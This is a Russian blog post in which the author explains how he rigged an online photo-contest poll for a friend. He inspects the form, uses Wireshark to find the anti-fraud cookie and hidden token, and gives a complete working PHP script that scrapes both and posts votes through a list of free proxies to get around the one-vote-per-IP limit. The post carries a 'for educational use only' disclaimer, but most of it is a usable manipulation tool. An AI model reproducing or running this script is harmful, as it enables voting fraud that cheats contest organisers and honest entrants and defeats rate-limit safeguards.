spiridonov.pro

Накрутка голосов на PHP на пальцах

Мои знакомые постоянно участвуют в различных конкурсах. При этом они привлекают к этому всех своих друзей и знакомых, рассылая в аське или вконтакте просьбы «Проголосуй за меня тут», «Проголосуй за фото» и т.д. Думаю, такая ситуация знакома многим. И вот однажды я решил помочь одной своей подруге и вот что из этого получилось.

Внимание! Данный пост написан исключительно для ознакомления. Используйте данную информацию только для разработки методов борьбы с накруткой при разработке собственных приложений. Играйте честно, друзья, и не нарушайте закон!

Для голосования не требовалось регистрации. Единственное ограничение было в том, что с одного IP можно голосовать не чаще, чем раз в 3 часа. Это значительно облегчало задачу. Первым делом я полез в куки браузера, чтобы почистить их. Конечно, вероятность такой халявы была очень мала, но я всё таки попробовал:) Очевидно, что IP адрес и время последнего голоса хранятся на сервере. Значит мы будем работать со списком прокси-серверов, чтобы обойти это.

План

Если в двух словах, то нам нужно определить, какие данные посылаются на сервер при нажатии на кнопку «Голосовать», и потом автоматизировать это, чтобы такие же данные отсылались быстро, часто и без рук:) По мере сложности нам придётся делать дополнительные действия перед отправкой данных. Всё зависит от того, что там для нас приготовили разработчики модуля голосования…

Исследуем HTML

Откроем исходный текст страницы с голосованием. Нас интересует тэг <form>, его атрибуты action и method, а так же все вложенные тэги <input>. Судя по всему это модуль aPoll для Joomla. Но на самом деле это не важно, потому что я опишу тут общие принципы, которые применимы для любого подобного механизма голосования.

Всё содержимое формы будет отправлено на сервер по нажатию на кнопку type=submit. Способ отправки данных формы на сервер указан в атрибуте method. Для отправки данных через форму используют методы GET или POST (в протоколе HTTP существуют ещё и другие методы, о которых вкратце можно почитать, например, тут). Данные уходят по адресу, указанному в action, в виде пар key=value. Если клиентская сторона веб-приложения реализована с применением ajax, то определить метод и адрес будет немного сложнее, но дальнейшие наши действия почти не будут отличаться (возможно, я расскажу об этом следующий раз).

Назначение почти всех <input> понятно. В глаза бросается только последний неведомый параметр:

<input type="hidden" name="dd972dd7998aca5da8349c281a530424" value="1" />

Если обновить страницу, то имя этого параметра изменится.

Поскольку используется метод POST, я предполагаю, что запрос будет выглядеть примерно так:

POST /path/to/voting/script HTTP/1.1
Host: www.target.ru
Connection: keep-alive
Content-Length: 89
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/html
voteid=83&option=com_apoll&id=20&format=raw&view=apoll&dd972dd7998aca5da8349c281a530424=1

Смотрим за пакетами

Чтобы получить точные данные, которые посылает браузер, я воспользовался Wireshark`ом. О снифферах и особенно о wifi-снифферах я расскажу подробнее в следующий раз.

Запускаем Wireshark, настраиваем фильтр так, чтобы отлавливались только пакеты от нас до нужного хоста и обратно (лишний мусор нам ни к чему). Ещё можно отключить картинки в браузере - это уменьшит объём трафика между нами и сервером и улучшить читаемость списка отловленных пакетов. Удаляем в браузере куки для этого сайта, открываем страницу с формой голосования, выбираем нужный пункт, нажимаем «Голосовать». Останавливаем захват пакетов. Ищем пакет POST:

Тут всё, как я и предполагал, за исключением строки:

Cookie: 0c8b34dacf4f14182867180a1aaba5c4=47e0e642a25f8b86d926b6f2cf9eef55

Теперь понятно зачем нужен тот неведомый параметр со страшным именем. Это простейшая защита от накрутки, которая лишь наполовину усложнит наш скрипт - нельзя тупо отправить POST-запрос на сервер, не загрузив перед этим страницу с голосованием. Откуда нам получить эту куку? Ищем пакет GET с запросом самой страницы. Следом за ним ищем ближайший HTTP/1.1 200 OK:

Из него нам нужна только строка Set-Cookie. Это указание браузеру сохранить куку key=value для текущего сайта, а точнее для его части, указанной в path (в нашем случае - это корень).

Теперь все звенья цепи собраны, можно начинать!

Реализация

Общая картина у нас теперь сложилась. Нам нужно запросить GET страницу с формой голосования, вытащить из заголовка куку и тот неведомый параметр из формы. Затем сформировать POST запрос с кукой, неведомым параметром и другими параметрами, которые остаются неизменными. Всё это нужно выполнять в цикле по файлу со списком прокси-серверов.

Выполнение скрипта будет занимать много времени - соответственно, его нельзя будет расположить у какого нибудь веб-хостера. Никаким шеллом я, к сожадению, не владею. Поэтому запускать буду на локальной машине:) Это крайне небезопасно, и я никому не рекомендую так делать!

Где достать список прокси? Для меня это тоже было проблемой. В сети много мест, где бесплатно публикуют списки прокси-серверов. Половина из них просто не работает. Две трети оставшихся ни разу не анонимны, но для наших целей вполне подойдут, так как всё же меняют REMOTE_ADDR. По началу я проверял найденные списки в программах прокси-чекерах. Но потом забил на это, потому что написанный скрипт сам переходил к следующему прокси из списка, если текущий не отвечал и вываливался по таймауту. Вид списков прокси серверов может быть разным: где-то адрес и порт могут разделяться двоеточием, где-то пробелами или табуляцией. В таком случае придётся подогнать разбор строк в скрипте под нужный формат записи.

После вечера кодирования и отладки у меня получилось так:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
<?php
function PostRequest($url, $proxy_host, $proxy_port, $data, $cookie)
{
    $url = parse_url($url);
    $host = $url['host'];
    $path = $url['path'];
    $fp = fsockopen($proxy_host, $proxy_port);
  if (!$fp)
      return;
    fputs($fp, "POST $path HTTP/1.1\r\n");
    fputs($fp, "Host: $host\r\n");
    fputs($fp, "Connection: close\r\n");
    fputs($fp, "Referer: $url\r\n");
  fputs($fp, "Accept: text/javascript, text/html, application/xml, text/xml, */*\r\n");
  fputs($fp, "Content-Length: ".strlen($data)."\r\n");
  fputs($fp, "Origin: $host\r\n");
  fputs($fp, "X-Requested-With: XMLHttpRequest\r\n");
  fputs($fp, "Content-type: application/x-www-form-urlencoded; charset=UTF-8\r\n");
  fputs($fp, "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13\r\n");
  fputs($fp, "Cookie: $cookie\r\n\r\n");
    fputs($fp, $data);
    $result = '';
    while(!feof($fp)) {
        $result .= fgets($fp, 128);
    }
    fclose($fp);
    $result = explode("\r\n\r\n", $result, 2);
    $header = isset($result[0]) ? $result[0] : '';
    $content = isset($result[1]) ? $result[1] : '';
    return array($header, $content);
}
function GetRequest($url, $proxy_host, $proxy_port)
{
    $url = parse_url($url);
    $host = $url['host'];
    $path = $url['path'];
    $fp = fsockopen($proxy_host, $proxy_port);
  if (!$fp)
      return;
    fputs($fp, "GET $path HTTP/1.1\r\n");
    fputs($fp, "Host: $host\r\n");
    fputs($fp, "Connection: close\r\n");
  fputs($fp, "Accept: text/javascript, text/html, application/xml, text/xml, */*\r\n");
  fputs($fp, "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13\r\n\r\n");
    $result = '';
    while(!feof($fp)) {
        $result .= fgets($fp, 128);
    }
    fclose($fp);
    $result = explode("\r\n\r\n", $result, 2);
    $header = isset($result[0]) ? $result[0] : '';
    $content = isset($result[1]) ? $result[1] : '';
    return array($header, $content);
}
$handle = @fopen("C:/proxylist.txt", "r");
if ($handle)
{
    while (($buffer = fgets($handle)) !== false)
  {
      $result = explode("\t", $buffer, 3);
      $proxy_host = isset($result[0]) ? $result[0] : '';
      $proxy_port = isset($result[1]) ? $result[1] : '';
      $proxy_port = str_replace("\n", "", $proxy_port);
      echo "$proxy_host : $proxy_port - ";
      if ($proxy_host != '' && $proxy_port != '')
      {
          list($header, $content) = GetRequest(
              "http://www.target.ru/road/to/hell",
              $proxy_host, $proxy_port
          );
          if (preg_match('/Set-Cookie: (.+);/', $header, $matches))
          {
              $cookie = $matches[1];
              if (preg_match('/<div><input type="hidden" name="(.+)" value="1" \/><\/div><\/form>/', $content, $matches))
              {
                  $fuck = $matches[1];
                  echo $fuck;
                  $data = "voteid=83&option=com_apoll&id=20&format=raw&view=apoll&$fuck=1";
                  list($header, $content) = PostRequest(
                      "http://www.target.ru/road/to/fucking/hell/fuck/yeah",
                      $proxy_host, $proxy_port,
                      $data, $cookie
                  );
                  echo " - OK\n";
              }
              else
              {
                  echo "Fuck fail\n";
              }
          }
          else
          {
              echo "Cookie fail\n";
          }
      }
    }
    fclose($handle);
}
?>

Не самый красивый код, но главное работает :)

UPD (21.03.2011): На сайте всё таки зачесались - сделали обязательной регистрацию для голосования :) Я переделывать скрипт не буду. Свою задачу он сделал, когда это было нужно. Требование регистрации усложняет задачу на порядок, но принцип накрутки всё равно останется таким же.

Комментарии